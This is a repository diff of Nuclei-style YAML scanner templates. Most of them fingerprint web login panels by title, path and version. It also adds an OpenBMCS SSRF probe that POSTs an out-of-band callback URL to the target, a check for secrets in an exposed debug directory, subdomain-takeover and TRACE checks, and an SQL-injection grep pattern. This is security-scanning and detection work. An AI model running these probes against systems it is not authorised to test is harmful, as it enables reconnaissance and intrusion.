author: pikpikcu,daffainfo
|
||||
severity: info
|
||||
tags: remkon,tech,panel
|
||||
metadata:
|
||||
shodan-query: http.title:"Remkon Device Manager"
|
||||
tags: panel,remkon,login
|
||||
|
||||
requests:
|
||||
- method: GET
|
|
@ -1,10 +1,12 @@
|
|||
id: sage-detect
|
||||
id: sage-panel
|
||||
|
||||
info:
|
||||
name: Sage X3 Detect
|
||||
author: pikpikcu
|
||||
name: Sage X3 Login Panel
|
||||
author: pikpikcu,daffainfo
|
||||
severity: info
|
||||
tags: tech,sage
|
||||
metadata:
|
||||
shodan-query: http.title:"Sage X3"
|
||||
tags: panel,sage,login
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -13,11 +15,12 @@ requests:
|
|||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<title>Sage X3</title>"
|
||||
- "'/auth/sage-id/registerStart'"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
|
@ -0,0 +1,31 @@
|
|||
id: seeddms-panel
|
||||
|
||||
info:
|
||||
name: SeedDMS Login Panel
|
||||
author: pussycat0x,daffainfo
|
||||
severity: info
|
||||
metadata:
|
||||
shodan-query: http.title:"SeedDMS"
|
||||
tags: panel,seeddms,login
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php"
|
||||
- "{{BaseURL}}/dms/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'href="/out/out.ViewFolder.php">SeedDMS</a>'
|
||||
- 'href="../out/out.ViewFolder.php?folderid=1">SeedDMS</a>'
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,9 +1,10 @@
|
|||
id: strapi-documentation
|
||||
|
||||
info:
|
||||
name: Strapi CMS - documentation plugin from marketplace (Make the documentation endpoint private. By default, the access is public)
|
||||
name: Strapi Documentation
|
||||
author: idealphase
|
||||
severity: info
|
||||
description: Strapi CMS - documentation plugin from marketplace (Make the documentation endpoint private. By default, the access is public)
|
||||
tags: strapi,panel
|
||||
|
||||
requests:
|
||||
|
|
|
@ -0,0 +1,33 @@
|
|||
id: threatq-login
|
||||
|
||||
info:
|
||||
name: ThreatQ login panel
|
||||
author: idealphase
|
||||
severity: info
|
||||
description: ThreatQ serves as an open and extensible threat intelligence platform that allows you to automate the intelligence lifecycle, quickly understand threats, make better decisions and accelerate detection and response
|
||||
reference: https://www.threatq.com/threat-intelligence-platform/
|
||||
tags: panel,threatq
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/login'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title ng-bind="PageTitle.getTitle()">ThreatQ</title>'
|
||||
- '<script src="/assets/js/threatq.min.js'
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- '<script src="/assets/js/threatq.min.js\?(.*)'
|
|
@ -0,0 +1,26 @@
|
|||
id: typo3-login
|
||||
|
||||
info:
|
||||
name: TYPO3 Login Detect
|
||||
author: dadevel
|
||||
severity: info
|
||||
tags: panel,typo3
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/typo3/"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "TYPO3 CMS"
|
||||
- "typo3-login-form"
|
||||
- "TYPO3 SVN ID:"
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,26 @@
|
|||
id: voipmonitor-panel
|
||||
|
||||
info:
|
||||
name: VoipMonitor panel
|
||||
author: Yanyun
|
||||
severity: info
|
||||
metadata:
|
||||
shodan-query: http.title:"VoIPmonitor"
|
||||
tags: panel,voipmonitor,login
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "appShareUrl = 'share.voipmonitor.org'"
|
||||
- "VoIPmonitor"
|
||||
condition: and
|
|
@ -0,0 +1,33 @@
|
|||
id: wallix-accessmanager-panel
|
||||
|
||||
info:
|
||||
name: Wallix Access Manager Panel
|
||||
author: righettod
|
||||
severity: info
|
||||
reference: https://www.wallix.com/privileged-access-management/access-manager/
|
||||
metadata:
|
||||
shodan-query: http.title:"Wallix Access Manager"
|
||||
tags: panel,wallix
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wabam'
|
||||
- '{{BaseURL}}/wabam/favicon.ico'
|
||||
|
||||
stop-at-first-match: true
|
||||
redirects: true
|
||||
max-redirects: 3
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "status_code==200"
|
||||
- "contains(tolower(body), '<title>wallix access manager</title>')"
|
||||
condition: and
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "status_code==200"
|
||||
- "('1745235488' == mmh3(base64_py(body)))"
|
||||
condition: and
|
|
@ -0,0 +1,37 @@
|
|||
id: wazuh-panel
|
||||
|
||||
info:
|
||||
name: Wazuh Login Panel
|
||||
author: cyllective,daffainfo
|
||||
severity: info
|
||||
description: Wazuh - The Open Source Security Platform
|
||||
reference: https://github.com/wazuh/wazuh
|
||||
metadata:
|
||||
shodan-query: http.title:"Wazuh"
|
||||
tags: panel,wazuh,login
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/app/login"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"id":"wazuh"'
|
||||
- '"title":"Wazuh"'
|
||||
- '"icon":"plugins/wazuh/img/icon_blue.png"'
|
||||
- '"url":"/app/wazuh"'
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- '"version":"([0-9.]+)"'
|
|
@ -0,0 +1,32 @@
|
|||
id: webmodule-ee-panel
|
||||
|
||||
info:
|
||||
name: Webmodule Login Panel
|
||||
author: pussycat0x,daffainfo
|
||||
severity: info
|
||||
metadata:
|
||||
google-dork: intitle:"Webmodule" inurl:"/webmodule-ee/login.seam" "Version"
|
||||
reference: https://www.exploit-db.com/ghdb/7001
|
||||
tags: panel,webmodule-ee,login
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/webmodule-ee/login.seam"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<title>Webmodule</title>"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- 'Version: ([0-9.]+)'
|
|
@ -0,0 +1,30 @@
|
|||
id: xxljob-panel
|
||||
|
||||
info:
|
||||
name: XXLJOB Admin Login Panel
|
||||
author: pdteam,daffainfo
|
||||
severity: info
|
||||
tags: panel,xxljob,login
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/xxl-job-admin/toLogin"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<a><b>XXL</b>JOB</a>"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- '"admin_version":"(.*?)"'
|
|
@ -1,10 +1,12 @@
|
|||
id: yzmcms-detect
|
||||
id: yzmcms-panel
|
||||
|
||||
info:
|
||||
name: YzmCMS Detect
|
||||
author: pikpikcu
|
||||
name: YzmCMS Login Panel
|
||||
author: pikpikcu,daffainfo
|
||||
severity: info
|
||||
tags: yzmcms,tech
|
||||
metadata:
|
||||
shodan-query: http.title:"YzmCMS"
|
||||
tags: panel,yzmcms,login
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -13,11 +15,13 @@ requests:
|
|||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'Powered By <a href="http://www.yzmcms.com"'
|
||||
- 'Powered By YzmCMS'
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,32 @@
|
|||
id: zblogphp-panel
|
||||
|
||||
info:
|
||||
name: Z-BlogPHP Panel
|
||||
author: princechaddha
|
||||
severity: info
|
||||
metadata:
|
||||
shodan-query: http.html:"Z-BlogPHP"
|
||||
tags: panel,zblogphp
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<meta name="generator" content="Z-BlogPHP'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- '<meta name="generator" content="([:A-Z-a-z 0-9.]+)"'
|
|
@ -2,9 +2,11 @@ id: manageengine-servicedesk
|
|||
|
||||
info:
|
||||
name: ZOHO ManageEngine ServiceDesk
|
||||
author: dhiyaneshDK
|
||||
author: dhiyaneshDK,righettod
|
||||
severity: info
|
||||
reference: https://www.shodan.io/search?query=http.title%3A%22ManageEngine+ServiceDesk+Plus%22
|
||||
reference:
|
||||
- https://www.shodan.io/search?query=http.title%3A%22ManageEngine+ServiceDesk+Plus%22
|
||||
- https://www.shodan.io/search?query=http.title%3A%22ManageEngine+ServiceDesk+Plus+-+MSP%22
|
||||
tags: panel,zoho,manageengine
|
||||
|
||||
requests:
|
||||
|
@ -17,6 +19,7 @@ requests:
|
|||
- type: word
|
||||
words:
|
||||
- '<title>ManageEngine ServiceDesk Plus</title>'
|
||||
- '<title>ManageEngine ServiceDesk Plus - MSP</title>'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: honeywell-scada-config
|
||||
|
||||
info:
|
||||
name: Honeywell Scada System – Information Disclosure
|
||||
name: Honeywell Scada System Information Disclosure
|
||||
author: alperenkesk
|
||||
severity: low
|
||||
reference: https://www.exploit-db.com/exploits/44734
|
||||
|
@ -22,4 +22,4 @@ requests:
|
|||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
|
|
File diff suppressed because it is too large
Load Diff
File diff suppressed because it is too large
Load Diff
|
@ -27,7 +27,7 @@ file:
|
|||
- type: regex
|
||||
# Investigate for possible SQL Injection
|
||||
# Likely vulnerable: $dbConn->GetRow("SELECT * FROM users WHERE id = $user_id");
|
||||
# Likely not Vulnerable: $dbConn->GetRow("SELECT * FROM users WHERE id = ?", array(‘$user_id’));
|
||||
# Likely not Vulnerable: $dbConn->GetRow("SELECT * FROM users WHERE id = ?", array('$user_id'));
|
||||
regex:
|
||||
- '(?i)getone|getrow|getall|getcol|getassoc|execute|replace'
|
||||
- type: regex
|
||||
|
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: AddEventlistener detection
|
||||
author: yavolo
|
||||
severity: info
|
||||
tags: xss
|
||||
tags: xss,misc
|
||||
reference: https://portswigger.net/web-security/dom-based/controlling-the-web-message-source
|
||||
|
||||
requests:
|
||||
|
@ -14,6 +14,6 @@ requests:
|
|||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'window.addEventListener('
|
||||
part: body
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: Apple app site association for harvesting end points
|
||||
author: panch0r3d
|
||||
severity: info
|
||||
tags: misc
|
||||
tags: misc,apple
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -17,17 +17,17 @@ requests:
|
|||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'applinks'
|
||||
- 'appID'
|
||||
- 'paths'
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'application/json'
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -11,6 +11,7 @@ requests:
|
|||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
|
@ -18,3 +19,4 @@ requests:
|
|||
- "Index of /"
|
||||
- "[To Parent Directory]"
|
||||
- "Directory: /"
|
||||
condition: or
|
|
@ -1,20 +0,0 @@
|
|||
id: display-via-header
|
||||
|
||||
info:
|
||||
name: Display Via Header
|
||||
author: geeknik
|
||||
reference: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Via
|
||||
severity: info
|
||||
tags: misc,generic
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
redirects: true
|
||||
extractors:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- "Via:.*"
|
|
@ -16,14 +16,14 @@ requests:
|
|||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "# @package Joomla"
|
||||
- "Joomla"
|
||||
- "Open Source Matters. All rights reserved"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/plain"
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -21,9 +21,9 @@ requests:
|
|||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "application/xml"
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -22,9 +22,9 @@ requests:
|
|||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/plain"
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -14,7 +14,7 @@ requests:
|
|||
Host: {{Hostname}}
|
||||
Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
|
||||
|
||||
threads: 50
|
||||
threads: 10
|
||||
payloads:
|
||||
path:
|
||||
- /
|
||||
|
|
|
@ -16,9 +16,9 @@ requests:
|
|||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '2022'
|
||||
part: body
|
||||
negative: true
|
||||
|
||||
- type: regex
|
||||
|
@ -28,10 +28,10 @@ requests:
|
|||
- '© [1-9]\d*'
|
||||
- '© [1-9]\d*'
|
||||
- '© [1-9]\d*'
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
name: copyright_year
|
||||
regex:
|
||||
- 'Copyright [1-9]\d*'
|
||||
- '© [1-9]\d*'
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: detect-options-method
|
||||
id: options-method
|
||||
|
||||
info:
|
||||
name: Detect enabled OPTIONS methods
|
||||
name: Allowed Options Method
|
||||
author: pdteam
|
||||
severity: info
|
||||
tags: misc,generic
|
|
@ -9,6 +9,7 @@ requests:
|
|||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/robots.txt"
|
||||
|
||||
matchers-condition: and
|
||||
redirects: true
|
||||
matchers:
|
||||
|
@ -17,9 +18,9 @@ requests:
|
|||
- "Disallow:"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/plain
|
||||
part: header
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
|
@ -10,20 +10,28 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/.well-known/security.txt"
|
||||
- "{{BaseURL}}/security.txt"
|
||||
- "{{RootURL}}/.well-known/security.txt"
|
||||
- "{{RootURL}}/security.txt"
|
||||
|
||||
stop-at-first-match: true
|
||||
redirects: true
|
||||
max-redirects: 3
|
||||
max-redirects: 2
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "Contact:"
|
||||
condition: and
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "len(body) <= 1024 && len(body) > 0"
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
group: 1
|
||||
regex:
|
||||
- '(?mi)Contact:(.*)'
|
|
@ -1,25 +0,0 @@
|
|||
id: tabnabbing-check
|
||||
|
||||
info:
|
||||
name: Reverse Tabnabbing
|
||||
author: bolli95
|
||||
severity: info
|
||||
tags: misc
|
||||
reference:
|
||||
- https://owasp.org/www-community/attacks/Reverse_Tabnabbing
|
||||
- https://www.youtube.com/watch?v=TMKZCHYmtD4
|
||||
- https://hackerone.com/reports/211065
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'regex("<a[A-z0-9\/\"\&\=\%\#\.\:\_\@\\\$ ]*target\=\"_blank\"[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*>", replace_regex(replace_regex(body, "<a[A-z0-9\/\"\&\=\%\#\.\:\_\@\\\$ ]*target\=\"_blank\"[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*(rel=\"noopener noreferrer\"|rel=\"noreferrer noopener\"|rel=\"noreferrer\"|rel=\"noopener\")[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*>", ""), "<a[A-z0-9\/\"\&\=\%\#\.\:\_\@\\\$ ]*(rel=\"noopener noreferrer\"|rel=\"noreferrer noopener\"|rel=\"noreferrer\"|rel=\"noopener\")[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*target\=\"_blank\"[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*>", "")) || regex("window\.open\\([^,]+\\)", body)'
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "!contains(tolower(all_headers), 'referrer-policy: no-referrer')"
|
|
@ -15,9 +15,9 @@ requests:
|
|||
matchers:
|
||||
- type: word
|
||||
name: trace-request
|
||||
part: body
|
||||
words:
|
||||
- "TRACE / HTTP"
|
||||
part: body
|
||||
|
||||
- method: OPTIONS
|
||||
path:
|
||||
|
@ -26,6 +26,6 @@ requests:
|
|||
matchers:
|
||||
- type: regex
|
||||
name: options-request
|
||||
part: header
|
||||
regex:
|
||||
- "(?i)Allow: [A-Z,]*TRACE"
|
||||
part: header
|
||||
|
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: JavaMelody Monitoring Exposed
|
||||
author: dhiyaneshDK,thomas_from_offensity
|
||||
severity: medium
|
||||
description: JavaMelody is a tool used to monitor Java or Java EE applications in QA and production environments. JavaMelody was detected on this web application. One option in the dashboard is to “View http sessions”. This can be used by an attacker to steal a user’s session.
|
||||
description: JavaMelody is a tool used to monitor Java or Java EE applications in QA and production environments. JavaMelody was detected on this web application. One option in the dashboard is to "View http sessions". This can be used by an attacker to steal a user's session.
|
||||
reference:
|
||||
- https://www.acunetix.com/vulnerabilities/web/javamelody-publicly-accessible/
|
||||
- https://github.com/javamelody/javamelody/wiki/UserGuide#16-security
|
||||
|
|
|
@ -0,0 +1,28 @@
|
|||
id: openbmcs-secret-disclosure
|
||||
|
||||
info:
|
||||
name: OpenBMCS 2.4 Secrets Disclosure
|
||||
author: dhiyaneshDK
|
||||
severity: high
|
||||
description: The application allows directory listing and information disclosure of some sensitive files that can allow an attacker to leverage the disclosed information and gain full BMS access
|
||||
reference: https://www.exploit-db.com/exploits/50671
|
||||
tags: openbmcs,misconfig
|
||||
metadata:
|
||||
shodan-query: http.favicon.hash:1550906681
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/debug/"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "change_password_sqls"
|
||||
- "Index of /debug"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,31 @@
|
|||
id: openbmcs-ssrf
|
||||
|
||||
info:
|
||||
name: OpenBMCS 2.4 Unauthenticated SSRF / RFI
|
||||
author: dhiyaneshDK
|
||||
severity: high
|
||||
description: Unauthenticated Server-Side Request Forgery (SSRF) and Remote File Include (RFI) vulnerability exists in OpenBMCS within its functionalities. The application parses user supplied data in the POST parameter 'ip' to query a server IP on port 81 by default. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host. This can be used by an external attacker for example to bypass firewalls and initiate a service and network enumeration on the internal network through the affected application, allows hijacking the current session of the user, execute cross-site scripting code or changing the look of the page and content modification on current display
|
||||
reference: https://www.exploit-db.com/exploits/50670
|
||||
tags: ssrf,oast,openbmcs
|
||||
metadata:
|
||||
shodan-query: http.favicon.hash:1550906681
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /php/query.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
|
||||
ip={{interactsh-url}}:80&argu=/
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the DNS Interaction
|
||||
words:
|
||||
- "http"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 302
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: Prometheus targets API endpoint
|
||||
author: geeknik
|
||||
severity: info
|
||||
description: The targets endpoint exposes services belonging to the infrastructure, including their roles and labels. In addition to showing the target machine addresses, the endpoint also exposes metadata labels that are added by the target provider. These labels are intended to contain non-sensitive values, like the name of the server or its description, but various cloud platforms may automatically expose sensitive data in these labels, oftentimes without the developer’s knowledge.
|
||||
description: The targets endpoint exposes services belonging to the infrastructure, including their roles and labels. In addition to showing the target machine addresses, the endpoint also exposes metadata labels that are added by the target provider. These labels are intended to contain non-sensitive values, like the name of the server or its description, but various cloud platforms may automatically expose sensitive data in these labels, oftentimes without the developer's knowledge.
|
||||
reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/
|
||||
tags: prometheus
|
||||
|
||||
|
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: Detect Springboot Thread Dump page
|
||||
author: philippedelteil
|
||||
severity: low
|
||||
description: The threaddump endpoint provides a thread dump from the application’s JVM.
|
||||
description: The threaddump endpoint provides a thread dump from the application's JVM.
|
||||
reference: https://docs.spring.io/spring-boot/docs/2.4.11-SNAPSHOT/actuator-api/htmlsingle/#threaddump
|
||||
tags: springboot
|
||||
|
||||
|
|
|
@ -15,6 +15,6 @@ requests:
|
|||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<h1 class="headline">Uh oh. That page doesn\’t exist.</h1>'
|
||||
- 'This page is reserved for artistic dogs.'
|
||||
- '<h1 class="headline">Uh oh. That page doesn’t exist.</h1>'
|
||||
condition: and
|
||||
|
|
|
@ -2,7 +2,7 @@ id: shopify-takeover
|
|||
|
||||
info:
|
||||
name: shopify takeover detection
|
||||
author: pdteam
|
||||
author: pdteam,philippedelteil
|
||||
severity: high
|
||||
tags: takeover
|
||||
reference: https://github.com/EdOverflow/can-i-take-over-xyz
|
||||
|
@ -26,4 +26,6 @@ requests:
|
|||
|
||||
- type: dsl
|
||||
dsl:
|
||||
- '!contains(host,"myshopify.com")'
|
||||
- '!contains(host,"myshopify.com")'
|
||||
- '!contains(host,"shopify.com")'
|
||||
condition: and
|
||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue